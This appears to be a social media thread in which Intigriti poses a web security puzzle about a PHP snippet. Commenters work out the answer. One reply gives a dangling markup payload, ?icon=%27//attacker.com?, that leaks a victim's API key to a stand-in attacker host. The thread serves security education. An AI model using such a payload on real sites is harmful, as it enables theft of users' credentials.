Intigriti 

Can you spot the vulnerability? πŸ”Ž

Show us how you'd steal your victim's API key in the comments πŸ‘‡

The best explanation gets a 25€ SWAG voucher!🎫

Dec 29, 2022 at 12:45pmWeb
Show threadIntigriti Dec 29, 2022

πŸ“œ Want to play around with the snippet?
Here's the code πŸ‘‡

https://gist.github.com/PinkDraconian/7060e82ae97ffd1aca30337416e7b0af

Spot The Vulnerability 29-12-2022

Spot The Vulnerability 29-12-2022 . GitHub Gist: instantly share code, notes, and snippets.

Gist
Show threadPatrick $8 Dec 29, 2022
@Intigriti Phishing link with modified icon parameter. Inject additional attributes into the link element as space is probably not disallowed by htmlspecialcharacters. Without reading the docs I don’t know what else
Show threadPatrick $8 Dec 29, 2022
@Intigriti onload or another JS code attribute with a Beef hook probably
Show threadIntigriti Dec 29, 2022
@phurd We've tried for quite a while to get JS attributes to work on link tags in the latest Chrome versions, but failed. Any chance you could provide a PoC of one that works?
There's something else here πŸ˜‰
Show threadsrjDec 29, 2022
@Intigriti The ENT_COMPAT flag is used in the call to htmlspecialchars for $_GET['icon'], so single quotes are left unescaped (https://www.php.net/manual/en/function.htmlspecialchars.php). This means it's vulnerable to dangling markup injection (https://portswigger.net/web-security/cross-site-scripting/dangling-markup), and as there's no single quote in the HTML until after the insertion point of $api_key (assuming no single quote in key?), a query parameter of e.g. ?icon=%27//attacker.com? would send everything in the HTML up to next single quote to attacker, including the key?
PHP: htmlspecialchars - Manual

Convert special characters to HTML entities

Show threadIntigriti Dec 30, 2022
@srj That's correct!